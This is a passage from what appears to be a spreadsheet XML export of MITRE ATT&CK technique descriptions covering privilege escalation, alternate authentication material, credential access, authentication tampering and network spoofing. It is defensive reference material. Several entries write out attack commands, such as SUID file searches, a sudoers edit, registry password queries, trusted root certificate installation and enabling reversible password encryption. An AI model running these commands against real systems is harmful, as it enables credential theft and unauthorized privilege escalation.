&quot;shell escape&quot; or other actions to bypass an execution environment with restricted permissions._x000a__x000a_Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an &quot;s&quot; instead of an &quot;x&quot; when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;find&lt;/code&gt; command can also be used to search for such files. For example, &lt;code&gt;find / -perm +4000 2&gt;/dev/null&lt;/code&gt; can be used to find files with setuid set and &lt;code&gt;find / -perm +2000 2&gt;/dev/null&lt;/code&gt; may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)"/>
  </r>
  <r>
    <x v="130"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)_x000a__x000a_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r>
  <r>
    <x v="130"/>
    <x v="11"/>
    <s v="Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges._x000a__x000a_Within Linux and MacOS systems, sudo (sometimes referred to as &quot;superuser do&quot;) allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command &quot;allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.&quot;(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_x000a__x000a_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ation: OSX.Dok Malware) Elevated privileges are required to edit this file though._x000a__x000a_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_x000a__x000a_In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt;.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default."/>
  </r>
  <r>
    <x v="130"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="130"/>
    <x v="11"/>
    <s v="Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. _x000a__x000a_Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)_x000a__x000a_Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) _x000a__x000a_Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)_x000a__x000a_While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)_x000a__x000a_**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)"/>
  </r>
  <r>
    <x v="130"/>
    <x v="11"/>
    <s v="Adversaries can manipulate or abuse the Transparency, Consent, &amp; Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy &amp; Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA)._x000a__x000a_When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)_x000a__x000a_Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)_x000a__x000a_"/>
  </r>
  <r>
    <x v="131"/>
    <x v="24"/>
    <s v="Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. _x000a__x000a_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_x000a__x000a_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_x000a_"/>
  </r>
  <r>
    <x v="131"/>
    <x v="24"/>
    <s v="Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials._x000a__x000a_Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) _x000a__x000a_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_x000a__x000a_For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a &quot;refresh&quot; token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)_x000a__x000a_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In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)_x000a__x000a_Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow."/>
  </r>
  <r>
    <x v="131"/>
    <x v="24"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also use stolen password hashes to &quot;overpass the hash.&quot;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
  </r>
  <r>
    <x v="131"/>
    <x v="24"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)_x000a__x000a_Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, &quot;overpassing the hash&quot; involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)"/>
  </r>
  <r>
    <x v="131"/>
    <x v="24"/>
    <s v="Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)_x000a__x000a_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_x000a__x000a_There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)"/>
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="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Citation: Brining MimiKatz to Unix)"/>
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="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_x000a__x000a_It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)_x000a__x000a_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r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="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_x000a__x000a_Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)_x000a__x000a_* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;_x000a_* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;"/>
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the &quot;history&quot;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
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_When a device is registered to Entra I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_x000a__x000a_On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) _x000a__x000a_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
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data._x000a__x000a_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_x000a__x000a_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_x000a__x000a_The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;._x000a_"/>
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)_x000a__x000a_These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)_x000a__x000a_The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:_x000a__x000a_* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;_x000a_* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)_x000a_* gpprefdecrypt.py_x000a__x000a_On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;_x000a_"/>
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)_x000a__x000a_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
  </r>
  <r>
    <x v="132"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="133"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="133"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)_x000a__x000a_2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers._x000a__x000a_3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="133"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)_x000a__x000a_Code signing certificates may be used to bypass security policies that require signed code to execute on a system. "/>
  </r>
  <r>
    <x v="133"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_*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_x000a_*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_x000a_*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_x000a_* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)._x000a__x000a_Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)"/>
  </r>
  <r>
    <x v="133"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)"/>
  </r>
  <r>
    <x v="133"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="133"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="134"/>
    <x v="18"/>
    <s v="Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications._x000a__x000a_Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)_x000a__x000a_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_x000a__x000a_After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)"/>
  </r>
  <r>
    <x v="135"/>
    <x v="1"/>
    <s v="Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Duke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
  </r>
  <r>
    <x v="135"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="135"/>
    <x v="1"/>
    <s v="An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)_x000a__x000a_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
  </r>
  <r>
    <x v="135"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a_ _x000a_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_x000a__x000a_Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)_x000a__x000a_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
  </r>
  <r>
    <x v="135"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running &lt;code&gt;rundll32.exe keymgr.dll KRShowKeyMgr&lt;/code&gt; then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI._x000a__x000a_Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)"/>
  </r>
  <r>
    <x v="135"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a_ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)"/>
  </r>
  <r>
    <x v="135"/>
    <x v="1"/>
    <s v="Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  _x000a__x000a_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_x000a__x000a_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_x000a__x000a_**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API."/>
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. _x000a__x000a_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
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. _x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="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_x000a__x000a_Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)_x000a__x000a_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
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices._x000a__x000a_[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Mandiant - Synful Knock)"/>
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)_x000a__x000a_If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:_x000a__x000a_1. Encrypted password (&lt;code&gt;G$RADIUSCHAP&lt;/code&gt;) from the Active Directory user-structure &lt;code&gt;userParameters&lt;/code&gt;_x000a_2. 16 byte randomly-generated value (&lt;code&gt;G$RADIUSCHAPKEY&lt;/code&gt;) also from &lt;code&gt;userParameters&lt;/code&gt;_x000a_3. Global LSA secret (&lt;code&gt;G$MSRADIUSCHAPKEY&lt;/code&gt;)_x000a_4. Static key hardcoded in the Remote Access Subauthentication DLL (&lt;code&gt;RASSFM.DLL&lt;/code&gt;)_x000a__x000a_With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)_x000a__x000a_An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to &quot;Windows Server 2008&quot; or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to &lt;code&gt;Set-ADUser -AllowReversiblePasswordEncryption $true&lt;/code&gt;."/>
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts._x000a__x000a_Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)_x000a__x000a_For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a &quot;fail open&quot; policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) _x000a__x000a_Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) "/>
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.  _x000a__x000a_Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):_x000a__x000a_* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud _x000a_* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory _x000a_* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID _x000a__x000a_AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. _x000a__x000a_By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)_x000a__x000a_In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)"/>
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) _x000a__x000a_Adversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)_x000a__x000a_Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)"/>
  </r>
  <r>
    <x v="136"/>
    <x v="25"/>
    <s v="Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource._x000a__x000a_For example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. _x000a__x000a_By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures."/>
  </r>
  <r>
    <x v="137"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics)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_x000a__x000a_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
  </r>
  <r>
    <x v="137"/>
    <x v="12"/>
    <s v="By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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 _x000a__x000a_Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)"/>
  </r>
  <r>
    <x v="137"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)_x000a__x000a_Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)_x000a_"/>
  </r>
  <r>
    <x v="137"/>
    <x v="12"/>
    <s v="Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)._x000a__x000a_DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: _x000a__x000a_1. The client broadcasts a `DISCOVER` message._x000a__x000a_2. The server responds with an `OFFER` message, which includes an available network address. _x000a__x000a_3. The client broadcasts a `REQUEST` message, which includes the network address offered. _x000a__x000a_4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters._x000a__x000a_Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network._x000a__x000a_DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a &lt;code&gt;INFORMATION-REQUEST (code 11)&lt;/code&gt; message to the &lt;code&gt;All_DHCP_Relay_Agents_and_Servers&lt;/code&gt; multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations._x000a__x000a_Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. "/>
  </r>
  <r>
    <x v="137"/>
    <x v="12"/>
    <s v="Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)_x000a__x000a_By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin)  Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic. _x000a__x000a_Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network._x000a__x000a_Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal 